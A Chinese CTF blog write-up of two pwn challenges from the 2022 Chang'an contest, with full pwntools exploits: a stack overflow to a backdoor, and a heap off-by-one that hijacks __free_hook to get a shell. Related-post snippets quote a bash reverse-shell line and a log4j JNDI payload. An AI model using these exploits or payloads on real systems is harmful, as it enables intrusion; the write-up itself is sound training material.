长安“战疫“网络安全卫士守护赛--PWN

已于 2022-03-10 11:50:49 修改
阅读量365 收藏 1
点赞数 3
文章标签: 安全 linux pwn
于 2022-01-09 00:22:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/122388635
版权

今天早上定了闹钟起来干题,还没怎么睡醒
这里我把前两道pwn题给分析一下

pwn1

例行检查:在这里插入图片描述
32位,没有开canary保护,没有pie,扔到IDA中
在这里插入图片描述buf大小0x38,判断为栈溢出,还有后门,心中正在窃喜,长安这道签到题是真简单呀,但做了之后发现这里main函数最后的返回还应注意一下
在这里插入图片描述
调用完read之后,不是leave retn,而是多了一行lea esp ,[ecx-4],这里应注意一下,将ecx-4的地址给了esp,相当于返回到了ecx-4的地址,(注意lea 区别于mov,mov传送的是地址所指的内容,而lea只是地址).,我们把返回地址写在ecx-4的地址,之后再用程序leak出的地址算出偏移,就可以get shell了,总体来说还可以,下边直接放出exp
exp:

#coding=utf-8
from pwn import*
io = remote('113.201.14.253',16088)
context(log_level='debug',os='linux',arch='i386')

shell_addr = 0x8048540

io.recvuntil('Gift:0x')
leak = int(io.recv(8),16)
success(hex(leak))
io.recvuntil('\n')

io.sendline(p32(shell_addr) + 'b'*0x30 + p32(leak+4))
io.interactive()

在这里插入图片描述
拿到flag!!

pwn2

检查程序:在这里插入图片描述
64位,保护机制全开,扔到IDA中分析,
是一道堆题,功能齐全,在add()函数中存在off by one 漏洞,
在这里插入图片描述
我们可以利用by one 改写pre_inuse位,构造overlap,残留指针,leak出libc地址,然后再次构造overlap,劫持free_hook指针,劫持到system()即可,然后free掉’/bin/sh\x00’从而拿到shell.
完整exp:

from pwn import *
elf = ELF('./pwn2')
io = remote('113.201.14.253',16066)
#io = process('./pwn2')
libc = ELF('./libc-2.27.so')
context(log_level='debug')

def choice(c):
	io.recvuntil(':')
	io.sendline(str(c))

def add(size,content):
	choice(1)
	io.recvuntil(':')
	io.sendline(str(size))
	io.recvuntil(':')
	io.send(content)

def edit(index,content):
	choice(2)
	io.recvuntil(':')
	io.sendline(str(index))
	io.recvuntil(':')
	io.send(content)

def free(index):
	choice(3)
	io.recvuntil(':')
	io.sendline(str(index))

def show(index):
	choice(4)
	io.recvuntil(':')
	io.sendline(str(index))

add(0x410,'A')
io.sendline()
add(0x68,'A')

for i in range(9):
	io.sendline()
	add(0xf0,'A')
io.sendline()
for i in range(7):
	free(i+4)
	
free(1)
free(0)
add(0x68,'A'*0x60 + p64(0x490) + '\x00')
io.sendline()
free(2)
add(0x410,'B')
io.sendline()
show(0)

leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
success(hex(leak))
libc_base = leak - 0x3ebca0
success(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']

success(hex(free_hook))
success(hex(system))

add(0x160,'A')

for i in range(8):
	io.sendline()
	add(0x100,'A')

io.sendline()

for i in range(7):
	free(i+4)

add(0x68,'N')
io.sendline()
add(0x410,'A')
io.sendline()
add(0x20,'A')
io.sendline()
free(11)
free(4)
add(0x68,'A'*0x60 + p64(0x180) + '\x20')
free(5)
free(4)

add(0x120,'A'*0x100 + p64(0) + p64(0x70) + p64(free_hook))
io.sendline()
add(0x60,'A')
io.sendline()
add(0x60,p64(system))
io.sendline()
add(0x20,'/bin/sh\x00')
io.sendline()
free(8)
io.sendline()
#gdb.attach(io)
io.interactive()

在这里插入图片描述
喜提pwn2 flag!!

Leee333
关注
长安战疫网络安全卫士守护部分writeup
weixin_52829570的博客
01-08 1816
解题过程 题目一 八卦迷宫 用画图工具手工连接,然后将路上的图表和字相对应 按顺序打出,然后根据题目要求换成全拼,加上图片里的前缀cazy{}提交 flag为: cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} 题目二 西安加油 用wireshark打开发现一个很大而且带有很多base64编码的流量 追踪http流,复制去解base64,得到一个zip 解压得
2021-鹏城实验室网络安全技能大-pwn-babyheap 题解
lifanxin的博客
09-28 2462
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
长安战疫网络安全卫士守护_crypto_复现
M3ng@L的博客
01-13 3798
长安战疫网络安全卫士守护_Crypto math 涉及的知识点:RSA加密未知模数,已知p对q的逆元以及q对p的逆元求RSA的模数N 题目描述 题目没有描述,只有已知量c,e,d,pinvq,qinvp 公式推导 已知pinvq,qinvp求n,这样我们才能求得m=cd(mod n)m=c^d(mod~n)m=cd(mod n) 所谓pinvq也就是p∗pinvq≡1(mod q)p*pinvq\equiv 1(mod~q)p∗pinvq≡1(mod q) qi
长安“战役“网络安全卫士守护
Keepb1ue的博客
01-14 2291
文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_doge Web shiro? 很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE 发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/
长安战疫网络安全-wp
qq_45603443的博客
01-11 5902
长安战疫网络安全-wpWebtpshiro?Baby_Uploadflag配送中心flaskRCE_No_ParaCryptono_can_no_bbmathLinearEquationsno_mah_no_cryno_cry_no_canMiscez_Encryptbinary西安加油Ez Steg八卦迷宫无字天书朴实无华的取证Reverselemoncombat_slogancute_dogehello_pyPwnpwn1重点来了 Web tp 文件上传+phar反序列化 <?php nam
长安战疫网络安全Writeup
Le1a's Blog
01-12 3937
Web RCE_No_Para 无参RCE ?1=system('tac flag.php');&code=eval(current(current(get_defined_vars()))); flask admin?static.js? 然后发现传参点:?name= 简单试了下SSTI,发现过滤了引号等符号 考虑attr结合16进制来绕过 {{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
2022年中职网络安全天津市任务九-PWN(2)
12-20
1.访问靶机 FSserver登录FTP,找到pwn1文件夹,下载内容进行作答,通过缓冲区溢出 对pwn1靶机进行破解,获取目标靶机 shell得到flag: Flagf}样例: flag{×xxx}。nc pwn1靶机ip 10000 2. 访问靶机FServer登录FTP,...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Bugku S3 AWD排位-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位-9 pwn二进制
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
长安战疫网络安全卫士守护crypto
永远相信美好的事情即将发生
03-24 7834
cry1 题目如下,就是一个脚本: from Crypto.Util.number import* from secret import flag,key assert len(key) <= 5 assert flag[:5] == b'cazy{' def can_encrypt(flag,key): block_len = len(flag) // len(key) + 1 new_key = key * block_len return bytes([i^j for
长安战疫网络安全卫士守护 WriteUp
as you know, nlp is fantasitc!
01-09 2788
长安守护 1、RCE_No_Para 参考一篇比较详细的bloghttps://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E6%B3%951%EF%BC%9Agetenv 源码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match('/session|end|next|header|dir
2022 长安战疫网络安全卫士守护 WriteUp
热门推荐
mumuzi的博客
01-08 1万+
2022 长安战疫部分wp
2021长安战疫网络安全卫士守护 misc部分writeup
ShenZ的博客
01-13 948
长安战疫网络安全卫士守护 部分writeup MISC朴实无华的取证西安加油 MISC 朴实无华的取证 λ volatility_2.6_win64_standalone.exe -f D:\download\xp_sp3\xp_sp3.raw --profile=WinXPSP2x86 cmdline filescan取出flag.zip和flag.png λ volatility_2.6_win64_standalone.exe -f D:\download\xp
2021长安抗疫杯签到pwn
pointerr的博客
01-20 229
checksec: 发现32位,开了NX,没别的保护,使用ida打开: 发现打印出了一个gift,直接运行,竟然是buf的栈地址。 binsh地址也知道了, 首先填充栈,其中一开始是binsh的地址, 然后填充栈,最后覆盖ebp为栈地址 思路直接打开: from pwn import* p = process("./pwn1") #p = remote("113.201.14.253",16088) p.recvuntil("Gift:") leak = int(p.recv(10),16) p.sen
长安战疫网络安全卫士守护 Shiro?
FSecurity的博客
01-14 2645
题:Shiro? 需要准备的环境: 反弹shell需要准备VPS、JNDI-Injection-Exploit工具启动rmi和ldap服务 JNDI-Injection-Exploit 需要jdk、mvn环境编译 VPS centos7 mvn jdk 打开题 测试存在漏洞 这里我用的是VPS的外网地址 成功获取到请求响应 反弹shell步骤 bash -i >&/dev/tcp/x.x.x.x/1111 0>&1 bash -c {echo,上面命令base64编码
长安战疫网络安全卫士守护部分wp
m0_56194555的博客
01-08 2928
长安战疫网络安全卫士守护部分wp 然后就是朴实无华的取证那个题 不知道是大小写的原因还是啥交不上,无字天书卡到最后那个长得好像摩斯密码的地方,收获满满,继续努力。
长安战疫网络安全卫士守护Writeup
末初的CSDN博客
01-08 4118
长安战疫Writeup
网络安全夺旗:CTF竞模式详解与入门指南
国内知名的CTF比有TCTF、XCTF全国联、XDCTF、HCTF以及信息安全铁人三项,这些事为国内网络安全人才的培养提供了平台。国际上,DEFCONCTF和UCSBiCTF等比代表了全球最高水平的技术对决,吸引了众多顶尖选手...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值